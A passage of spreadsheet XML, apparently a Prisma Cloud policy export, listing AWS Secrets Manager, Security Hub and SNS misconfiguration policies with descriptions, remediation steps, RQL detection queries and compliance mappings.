      <c r="B2119" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2119" s="2" t="inlineStr"/>
      <c r="D2119" t="inlineStr"/>
      <c r="E2119" t="inlineStr"/>
      <c r="F2119" t="inlineStr"/>
      <c r="G2119" t="b">
        <v>1</v>
      </c>
      <c r="H21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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2119" t="inlineStr">
        <is>
          <t>aws-secretsmanager</t>
        </is>
      </c>
      <c r="K2119" t="inlineStr">
        <is>
          <t>test- find secreate not used for 90 days or more</t>
        </is>
      </c>
      <c r="L2119" t="inlineStr"/>
      <c r="M2119" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2119" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2119" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2119" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2119" t="inlineStr"/>
      <c r="R2119" t="inlineStr"/>
      <c r="S2119" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="T2119" t="b">
        <v>0</v>
      </c>
      <c r="U2119" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2119" t="inlineStr">
        <is>
          <t>aws-secretsmanager-describe-secret</t>
        </is>
      </c>
      <c r="W2119" t="inlineStr"/>
      <c r="X2119" t="inlineStr"/>
      <c r="Y2119" t="inlineStr"/>
      <c r="Z2119" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-secretsmanager-describe-secret' AND json.rule = '_DateTime.ageInDays(lastAccessedDate) &gt; 90'</t>
        </is>
      </c>
      <c r="AA2119" t="inlineStr">
        <is>
          <t>Zoheb Sarwar</t>
        </is>
      </c>
      <c r="AB2119" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2119" t="inlineStr"/>
      <c r="AD2119" t="b">
        <v>0</v>
      </c>
      <c r="AE2119" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2119" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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19" t="inlineStr">
        <is>
          <t>b76c20f1-4581-4ccb-9e2f-fa736931539c</t>
        </is>
      </c>
      <c r="AI2119" t="inlineStr">
        <is>
          <t>cafccc40-80fe-4561-a826-9e78057545b7</t>
        </is>
      </c>
      <c r="AJ2119" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2119" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2120">
      <c r="A2120" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, ITSG-33, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2120" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2120" s="2" t="inlineStr"/>
      <c r="D2120" t="inlineStr"/>
      <c r="E2120" t="inlineStr"/>
      <c r="F2120" t="inlineStr"/>
      <c r="G2120" t="b">
        <v>1</v>
      </c>
      <c r="H21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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2120" t="inlineStr">
        <is>
          <t>aws-secretsmanager</t>
        </is>
      </c>
      <c r="K2120" t="inlineStr">
        <is>
          <t>AWS Secrets Manager secret not used for more than 90 days</t>
        </is>
      </c>
      <c r="L2120" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2120" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2120" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2120" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2120" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2120" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2120" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2120" t="inlineStr"/>
      <c r="T2120" t="b">
        <v>0</v>
      </c>
      <c r="U2120" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2120" t="inlineStr">
        <is>
          <t>aws-secretsmanager-describe-secret</t>
        </is>
      </c>
      <c r="W2120" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Secrets Manager secret not accessed within 90 days. 
AWS Secrets Manager securely stores and manages sensitive information like API keys, passwords, and certificates. Leaving unused secrets in AWS Secrets Manager increases the risk of security breaches by providing unnecessary access points for attackers, potentially leading to unauthorized data access or leaks.
It is recommended to routinely review and delete unused secrets to reduce the attack surface and potential for unauthorized access.</t>
        </is>
      </c>
      <c r="X2120" t="inlineStr">
        <is>
          <t>To delete an unused AWS Secrets Manager secret, perform the following actions:
1. Sign in to the AWS Management Console
2. Select the region from the dropdown in the top right corner where the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Security, Identity, &amp; Compliance', select 'Secrets Manager'
4. Select the reported Secrets Manager secret
5. In the Secret details section, choose 'Actions', and then choose 'Delete secret'
6. In the Disable secret and schedule deletion dialog box, in Waiting period, enter the number of days to wait before the deletion becomes permanent.
7. Choose 'Schedule deletion'</t>
        </is>
      </c>
      <c r="Y2120" t="inlineStr"/>
      <c r="Z2120" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-secretsmanager-describe-secret' AND json.rule = '(lastAccessedDate does not exist and _DateTime.ageInDays(createdDate) &gt; 90) or (lastAccessedDate exists and _DateTime.ageInDays(lastAccessedDate) &gt; 90)'</t>
        </is>
      </c>
      <c r="AA2120" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2120" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2120" t="inlineStr">
        <is>
          <t>PC-AWS-ASM-1176</t>
        </is>
      </c>
      <c r="AD2120" t="b">
        <v>1</v>
      </c>
      <c r="AE2120" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2120" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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0" t="inlineStr">
        <is>
          <t>584b8e25-71de-4d12-8248-109410b6901a</t>
        </is>
      </c>
      <c r="AI2120" t="inlineStr">
        <is>
          <t>a2b5812d-2328-4a7b-b124-566d257620e7</t>
        </is>
      </c>
      <c r="AJ2120" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2120" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2121">
      <c r="A2121" t="inlineStr"/>
      <c r="B2121" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2121" s="2" t="inlineStr"/>
      <c r="D2121" t="inlineStr"/>
      <c r="E2121" t="inlineStr"/>
      <c r="F2121" t="inlineStr"/>
      <c r="G2121" t="b">
        <v>1</v>
      </c>
      <c r="H21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21" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2121" t="inlineStr">
        <is>
          <t>aws-secretsmanager</t>
        </is>
      </c>
      <c r="K2121" t="inlineStr">
        <is>
          <t>AWS Secrets Manager secret not configured to rotate within 90 days</t>
        </is>
      </c>
      <c r="L2121" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2121" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2121" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2121" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2121" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2121" t="inlineStr"/>
      <c r="R2121" t="inlineStr"/>
      <c r="S2121" t="inlineStr"/>
      <c r="T2121" t="b">
        <v>0</v>
      </c>
      <c r="U2121" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2121" t="inlineStr">
        <is>
          <t>aws-secretsmanager-describe-secret</t>
        </is>
      </c>
      <c r="W2121" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Secrets Manager secret is not configured to automatically rotate the secret within 90 days.
Rotating secrets minimizes the risk of compromised credentials and reduces exposure to potential threats. Failing to rotate secrets increases the risk of security breaches and prolonged exposure to threats.
It is recommended to configure automatic rotation in AWS Secrets Manager to replace long-term secrets with short-term ones, reducing the risk of compromise.</t>
        </is>
      </c>
      <c r="X2121" t="inlineStr">
        <is>
          <t>To set up automatic rotation for Amazon RDS, Amazon Aurora, Amazon Redshift, or Amazon DocumentDB secrets, refer to the below link:
https://docs.aws.amazon.com/secretsmanager/latest/userguide/rotate-secrets_turn-on-for-db.html
To set up automatic rotation for non-database AWS Secrets Manager secrets, refer to the below link:
https://docs.aws.amazon.com/secretsmanager/latest/userguide/rotate-secrets_turn-on-for-other.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-304
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-304</t>
        </is>
      </c>
      <c r="Y2121" t="inlineStr"/>
      <c r="Z2121" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-secretsmanager-describe-secret' AND json.rule = rotationEnabled is true and owningService is not member of (appflow, databrew, datasync, directconnect, events, opsworks-cm, rds, sqlworkbench) and rotationRules.automaticallyAfterDays exists and rotationRules.automaticallyAfterDays greater than 90
{"category":"General","resourceTypes":["aws_secretsmanager_secret_rotation"]}</t>
        </is>
      </c>
      <c r="AA2121" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2121" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2121" t="inlineStr">
        <is>
          <t>PC-AWS-ASM-1252-CKV_AWS_304</t>
        </is>
      </c>
      <c r="AD2121" t="b">
        <v>1</v>
      </c>
      <c r="AE2121" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2121" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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21" t="inlineStr">
        <is>
          <t>1f61e327-9c50-4fa3-a14b-14513f3e14a3</t>
        </is>
      </c>
      <c r="AI2121" t="inlineStr">
        <is>
          <t>e3b2cd2f-44da-4353-a170-2d294427eca0</t>
        </is>
      </c>
      <c r="AJ2121" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2121" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2122">
      <c r="A2122" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, GDPR, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2122" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2122" s="2" t="inlineStr"/>
      <c r="D2122" t="inlineStr"/>
      <c r="E2122" t="inlineStr"/>
      <c r="F2122" t="inlineStr"/>
      <c r="G2122" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2122" t="inlineStr">
        <is>
          <t>aws-secretsmanager</t>
        </is>
      </c>
      <c r="K2122" t="inlineStr">
        <is>
          <t>AWS Secrets Manager secret not encrypted by Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L2122" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2122" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2122" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2122" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2122" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2122" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2122" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2122" t="inlineStr"/>
      <c r="T2122" t="b">
        <v>0</v>
      </c>
      <c r="U2122" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2122" t="inlineStr">
        <is>
          <t>aws-secretsmanager-describe-secret</t>
        </is>
      </c>
      <c r="W2122" t="inlineStr">
        <is>
          <t>This policy identifies AWS Secrets Manager secrets that are encrypted using the default KMS key instead of CMK (Customer Managed Key) or using a CMK that is disabled.
AWS Secrets Manager secrets are a secure storage solution for sensitive information like passwords, API keys, and tokens in the AWS cloud. Secrets Manager secrets are encrypted by default by AWS managed key but users can specify CMK to get enhanced security, control over the encryption key, and also comply with any regulatory requirements.
As a security best practice, using CMK to encrypt your Secrets Manager secrets is advisable as it gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X2122" t="inlineStr">
        <is>
          <t>To change the encryption key for a Secrets Manager secret:
1. Open the Secrets Manager console at https://console.aws.amazon.com/secretsmanager/.
2. From the list of secrets, choose the reported secret.
3. On the secret details page, in the Secrets details section, choose Actions, and then choose 'Edit encryption key'.
4. in the 'Encryption key' section choose the Customer Managed Key created and managed by you in AWS Key Management Service (KMS) based on your business requirement.
5. Click 'Save' button to save the changes.
Note: When using customer-managed CMKs to encrypt Secrets Manager secret, Ensure authorized entities have access to the key and its associated operations. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-secrets-manager-secret-is-encrypted-using-kms
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-secrets-manager-secret-is-encrypted-using-kms</t>
        </is>
      </c>
      <c r="Y2122" t="inlineStr"/>
      <c r="Z2122" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-secretsmanager-describe-secret' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyManager does not equal CUSTOMER or (keyMetadata.keyManager equals CUSTOMER and keyMetadata.keyState equals Disabled) as Y; filter '($.X.kmsKeyId does not exist ) or ($.X.kmsKeyId exists and $.X.kmsKeyId equals $.Y.keyMetadata.arn)'; show X;
{"category":"General","resourceTypes":["aws_secretsmanager_secret"]}</t>
        </is>
      </c>
      <c r="AA2122" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2122" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2122" t="inlineStr">
        <is>
          <t>PC-AWS-ASM-1134-CKV_AWS_149</t>
        </is>
      </c>
      <c r="AD2122" t="b">
        <v>1</v>
      </c>
      <c r="AE2122" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2122" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>8d4c6ccf-d558-49ff-ab7f-6db986b065f5</t>
        </is>
      </c>
      <c r="AI2122" t="inlineStr">
        <is>
          <t>e6503172-b262-4949-b651-e8ffb3947167</t>
        </is>
      </c>
      <c r="AJ2122" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2122" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2123">
      <c r="A2123" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2123" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2123" s="2" t="inlineStr"/>
      <c r="D2123" t="inlineStr"/>
      <c r="E2123" t="inlineStr"/>
      <c r="F2123" t="inlineStr"/>
      <c r="G2123" t="b">
        <v>1</v>
      </c>
      <c r="H21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23" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2123" t="inlineStr">
        <is>
          <t>aws-secretsmanager</t>
        </is>
      </c>
      <c r="K2123" t="inlineStr">
        <is>
          <t>AWS Secrets Manager secret configured with automatic rotation not rotated as scheduled</t>
        </is>
      </c>
      <c r="L2123" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2123" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2123" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2123" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2123" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2123" t="inlineStr">
        <is>
          <t>TA0004</t>
        </is>
      </c>
      <c r="R2123" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0004)</t>
        </is>
      </c>
      <c r="S2123" t="inlineStr"/>
      <c r="T2123" t="b">
        <v>0</v>
      </c>
      <c r="U2123" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2123" t="inlineStr">
        <is>
          <t>aws-secretsmanager-describe-secret</t>
        </is>
      </c>
      <c r="W2123" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Secrets Manager secret not rotated successfully based on the rotation schedule.
Secrets Manager stores secrets centrally, encrypts them automatically, controls access, and rotates secrets safely. By rotating secrets, you replace long-term secrets with short-term ones, limiting the risk of unauthorized use. If secrets fail to rotate in Secrets Manager, long-term secrets remain in use, increasing the risk of unauthorized access and potential data breaches.
It is recommended that proper configuration and monitoring of the rotation process be ensured to mitigate these risks.</t>
        </is>
      </c>
      <c r="X2123" t="inlineStr">
        <is>
          <t>For help diagnosing and fixing common errors related to secrets rotation, refer to the URL:
https://docs.aws.amazon.com/secretsmanager/latest/userguide/troubleshoot_rotation.html</t>
        </is>
      </c>
      <c r="Y2123" t="inlineStr"/>
      <c r="Z2123" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-secretsmanager-describe-secret' AND json.rule = 'lastRotatedDate exists and rotationEnabled is true and _DateTime.daysBetween($.lastRotatedDate,today()) &gt; $.rotationRules.automaticallyAfterDays'</t>
        </is>
      </c>
      <c r="AA2123" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2123" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2123" t="inlineStr">
        <is>
          <t>PC-AWS-ASM-1273</t>
        </is>
      </c>
      <c r="AD2123" t="b">
        <v>1</v>
      </c>
      <c r="AE2123" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2123" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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23" t="inlineStr">
        <is>
          <t>0e6e878a-151a-4c07-bbf6-a6116c551d44</t>
        </is>
      </c>
      <c r="AI2123" t="inlineStr">
        <is>
          <t>7a2ee3fc-cbe4-4fbe-8eb0-3fcd53fe57e5</t>
        </is>
      </c>
      <c r="AJ2123" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2123" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2124">
      <c r="A2124" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (AWS) - Level 2, CIS v3.0.0 (AWS) Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2124" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2124" s="2" t="inlineStr"/>
      <c r="D2124" t="n">
        <v>0</v>
      </c>
      <c r="E2124" t="n">
        <v>0</v>
      </c>
      <c r="F2124" t="n">
        <v>17</v>
      </c>
      <c r="G2124" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2124" t="inlineStr">
        <is>
          <t>aws-securityhub</t>
        </is>
      </c>
      <c r="K2124" t="inlineStr">
        <is>
          <t>AWS Security Hub is not enabled</t>
        </is>
      </c>
      <c r="L2124" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2124" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2124" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2124" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2124" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2124" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2124" t="inlineStr">
        <is>
          <t>IM-8</t>
        </is>
      </c>
      <c r="S2124" t="inlineStr"/>
      <c r="T2124" t="b">
        <v>0</v>
      </c>
      <c r="U2124" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2124" t="inlineStr">
        <is>
          <t>aws-securityhub-hub</t>
        </is>
      </c>
      <c r="W2124" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Security Hub that is not enabled in specific regions. 
AWS Security Hub is a centralized security management service by Amazon Web Services, providing a comprehensive view of your security posture and automating security checks across AWS accounts. Failure to enable AWS Security Hub in all regions may lead to limited visibility and compromised threat detection across your AWS environment.
It is recommended to enable AWS Security Hub in all regions for consistent visibility and enhanced threat detection across your AWS environment.</t>
        </is>
      </c>
      <c r="X2124" t="inlineStr">
        <is>
          <t>To enable the AWS Security Hub, perform the following actions:
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. In the Navigation Panel on the left, Select 'All services' and under 'Security, Identity, &amp; Compliance', select 'Security Hub'
4. When you open the Security Hub console for the first time, choose 'Go to Security Hub'
5. On the welcome page, the 'Security standards' section lists the security standards that Security Hub supports
6. Select the check box for a standard to enable it
8. Choose 'Enable Security Hub'</t>
        </is>
      </c>
      <c r="Y2124" t="inlineStr"/>
      <c r="Z2124" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-securityhub-hub' AND json.rule = SubscribedAt exists as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2124" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2124" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2124" t="inlineStr">
        <is>
          <t>PC-AWS-ASHUB-1192</t>
        </is>
      </c>
      <c r="AD2124" t="b">
        <v>1</v>
      </c>
      <c r="AE2124" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2124" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>852095a3-3f83-4e9b-a976-bb8dec5d1f39</t>
        </is>
      </c>
      <c r="AI2124" t="inlineStr">
        <is>
          <t>b44541c5-3dbd-4b42-84dc-7e14e29b6abb</t>
        </is>
      </c>
      <c r="AJ2124" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2124" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2125">
      <c r="A2125" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2,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CIS AWS 3 Tier Web Architecture Benchmark v.1.0.0, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3,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ITSG-33, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, CRI Profile v2.0, SOC 2, SOC 2, ISO/IEC 27001:2022, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC</t>
        </is>
      </c>
      <c r="B2125" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2125" s="2" t="inlineStr"/>
      <c r="D2125" t="inlineStr"/>
      <c r="E2125" t="inlineStr"/>
      <c r="F2125" t="inlineStr"/>
      <c r="G2125" t="b">
        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2125" t="inlineStr">
        <is>
          <t>aws-sns</t>
        </is>
      </c>
      <c r="K2125" t="inlineStr">
        <is>
          <t>AWS SNS topic policy overly permissive for publishing</t>
        </is>
      </c>
      <c r="L2125" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2125" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2125" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2125" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2125" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2125" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2125" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2125" t="inlineStr"/>
      <c r="T2125" t="b">
        <v>0</v>
      </c>
      <c r="U2125" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2125" t="inlineStr">
        <is>
          <t>aws-sns-get-topic-attributes</t>
        </is>
      </c>
      <c r="W2125" t="inlineStr">
        <is>
          <t>This policy identifies AWS SNS topics that have SNS policy overly permissive for publishing. When a message is published, Amazon SNS attempts to deliver the message to the subscribed endpoints. To protect these messages from attackers and unauthorized accesses, permissions should be given to only authorized users.
For more details:
https://docs.aws.amazon.com/sns/latest/dg/sns-security-best-practices.html#implement-least-privilege-access</t>
        </is>
      </c>
      <c r="X2125" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the 'Simple Notification Service' dashboard
4. Go to 'Topics', from the left panel
5. Select the reported SNS topic
6. Click on the 'Edit' button from the top options bar
7. On the edit page go to the 'Access Policy - optional' section
8. Add the restrictive 'Condition' statement to the JSON editor to specify who can publish messages to the topic.
9. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2125" t="inlineStr"/>
      <c r="Z2125" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-sns-get-topic-attributes' AND json.rule = Policy.Statement[?any(Effect equals Allow and (Principal.AWS equals * or Principal equals *) and (Action contains SNS:Publish or Action contains sns:Publish) and (Condition does not exist or Condition all empty))] exists</t>
        </is>
      </c>
      <c r="AA2125" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2125" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2125" t="inlineStr">
        <is>
          <t>PC-AWS-SNS-671</t>
        </is>
      </c>
      <c r="AD2125" t="b">
        <v>1</v>
      </c>
      <c r="AE2125" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2125" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>15492dd6-455b-4487-a910-e3608b2ce9a2</t>
        </is>
      </c>
      <c r="AI2125" t="inlineStr">
        <is>
          <t>8d0484cb-f5b3-4df3-b54f-cb2453190002</t>
        </is>
      </c>
      <c r="AJ2125" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2125" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2126">
      <c r="A2126" t="inlineStr">
        <is>
